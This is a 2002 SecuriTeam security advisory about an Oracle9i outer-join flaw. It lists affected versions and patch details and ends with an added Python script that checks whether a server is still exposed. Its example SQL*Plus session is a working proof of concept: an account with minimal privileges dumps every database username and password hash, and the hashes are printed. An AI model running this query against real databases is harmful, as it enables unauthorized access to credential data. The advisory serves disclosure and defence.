[NEWS] User Privileges Vulnerability in Oracle9i Database Server
From: support@securiteam.com Date: 04/21/02
From: support@securiteam.com To: list@securiteam.com Date: Sun, 21 Apr 2002 20:57:48 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
User Privileges Vulnerability in Oracle9i Database Server
------------------------------------------------------------------------
SUMMARY
A potential security vulnerability has been discovered in the Oracle9i
database server. A user defined in the Oracle9i database server with
limited privileges can potentially access privileged data by using the SQL
syntax for outer joins. As such, a knowledgeable and malicious user can
gain unauthorized access to data in the Oracle9i database server.
DETAILS
Vulnerable systems:
Oracle9i Database, Release 9.0.1.x
Immune systems:
None of the Oracle8i (Release 8.1.x), Oracle8 (Release 8.0.x) or Oracle7
database server releases is affected by this vulnerability.
Oracle9i includes the new ANSI outer join syntax. Oracle still supports
the old syntax, but the new syntax has a serious security issue that
allows any user to view any data.
Workarounds:
There are no workarounds to protect against this potential vulnerability.
Patch Information:
Oracle has fixed the potential vulnerability identified above in the
upcoming Oracle Database server release, Oracle9i Release 2. Patches with
the base bug fix number 2121935 are being made available only for
supported releases of the Oracle9i database server (Release 9.0.1.x), on
all supported platforms.
Download currently available patches for your platform from Oracle's
Worldwide Support web site, Metalink, at
http://metalink.oracle.com. Activate the "Patches" button to get to the
patches Web page. Enter the base bug fix number indicated above and
activate the "Submit" button. Please check with Metalink or Oracle
Worldwide Support Services periodically for patch availability if the
patch for your platform is not yet available.
Example:
SQL> connect / as sysdba
Connected.
SQL> CREATE USER us1 IDENTIFIED BY us11;
User created.
SQL> Grant Create Session to us1;
Grant succeeded.
SQL> connect us1/us11;
Connected.
SQL> select a.username, a.password
2 from sys.dba_users a left outer join sys.dba_users b on
3 b.username = a.username
4 ;
USERNAME PASSWORD
------------------------------ ------------------------------
SYS D4C5016086B2DC6A
SYSTEM D4DF7931AB130E37
DBSNMP E066D214D5421CCC
AURORA$JIS$UTILITY$ INVALID_ENCRYPTED_PASSWORD
OSE$HTTP$ADMIN INVALID_ENCRYPTED_PASSWORD
AURORA$ORB$UNAUTHENTICATED INVALID_ENCRYPTED_PASSWORD
SCOTT F894844C34402B67
US1 491AB9AB94D8A9EF
OUTLN 4A3BA55E08595C81
ORDSYS 7EFA02EC7EA6B86F
OLAPSVR AF52CFD036E8F425
USERNAME PASSWORD
------------------------------ ------------------------------
OLAPSYS 3FB8EF9DB538647C
ORDPLUGINS 88A2B2C183431F00
MDSYS 72979A94BAD2AF80
CTXSYS 71E687F036AD56E5
WKSYS 69ED49EE1851900D
OLAPDBA 1AF71599EDACFB00
QS_CBADM 7C632AFB71F8D305
QS_ADM 991CDDAD5C5C32CA
QS 8B09C6075BDF2DC4
QS_WS 24ACF617DD7D8F2F
HR 6399F3B38EDF3288
USERNAME PASSWORD
------------------------------ ------------------------------
OE 9C30855E7E0CB02D
PM 72E382A52E89575A
SH 9793B3777CD3BD1A
QS_ES E6A6FA4BB042E3C2
QS_OS FF09F3EB14AE5C26
RMAN E7B5D92911C831E1
QS_CB CF9CFACF5AE24964
QS_CS 91A00922D8C0F146
30 rows selected.
SQL>
This illustrates that a user with the barest of privileges, i.e. CREATE
SESSION, can actually see data in the data dictionary that should not be
seen. In this example, the user can select the list of usernames and their
password hashes.
ADDITIONAL INFORMATION
The information has been provided by
Pete Finnigan <pete@peterfinnigan.demon.co.uk>.
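An added example, not part of the original advisory or of Oracle's materials: a Python check that reads the spooled SQL*Plus output of the example query above, run as a CREATE SESSION-only account, and reports whether dictionary rows still came back once the fix is applied. The sample spools, the banner string and the function names are constructed for illustration, and treating ORA-00942 as the "access denied" result is an assumption about how a fixed server answers.

```python
import re

# Constructed SQL*Plus spools (not real output) of the advisory's outer-join
# query, run as a CREATE SESSION-only account before and after the fix.
SPOOL_EXPOSED = """\
USERNAME                       PASSWORD
------------------------------ ------------------------------
SYS                            0123456789ABCDEF
SYSTEM                         FEDCBA9876543210
USERNAME                       PASSWORD
------------------------------ ------------------------------
TESTUSER                       INVALID_ENCRYPTED_PASSWORD

3 rows selected.
"""
SPOOL_DENIED = """\
ERROR at line 2:
ORA-00942: table or view does not exist
"""

AFFECTED = re.compile(r"(?<![\d.])9\.0\.1(?!\d)")  # advisory: Release 9.0.1.x
ROW = re.compile(r"^(\S+)\s+([0-9A-F]{16}|INVALID_ENCRYPTED_PASSWORD)$")
COUNT = re.compile(r"^(\d+) rows? selected\.$")

def parse_spool(text):
    """Return (usernames, reported_row_count, ora_error_codes)."""
    users, reported, errors = [], None, []
    for line in map(str.strip, text.splitlines()):
        if m := ROW.match(line):          # repeated page headers never match
            users.append(m.group(1))
        elif m := COUNT.match(line):
            reported = int(m.group(1))
        elif line.startswith("ORA-"):
            errors.append(line.split(":", 1)[0])
    return users, reported, errors

def assess(banner, spool):
    """Classify one host: (status, release_is_affected, spool_complete)."""
    users, reported, errors = parse_spool(spool)
    if users:
        status = "EXPOSED"        # dictionary rows reached an unprivileged user
    elif "ORA-00942" in errors:
        status = "DENIED"         # assumed result when the access check holds
    else:
        status = "INCONCLUSIVE"   # empty or unexpected spool: rerun by hand
    complete = reported is None or reported == len(users)
    return status, bool(AFFECTED.search(banner)), complete

if __name__ == "__main__":
    banner = "Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production"  # constructed
    print(assess(banner, SPOOL_EXPOSED), assess(banner, SPOOL_DENIED))
```

A spool whose "rows selected" count disagrees with the parsed rows is reported as incomplete, so it can be captured again before the result is trusted.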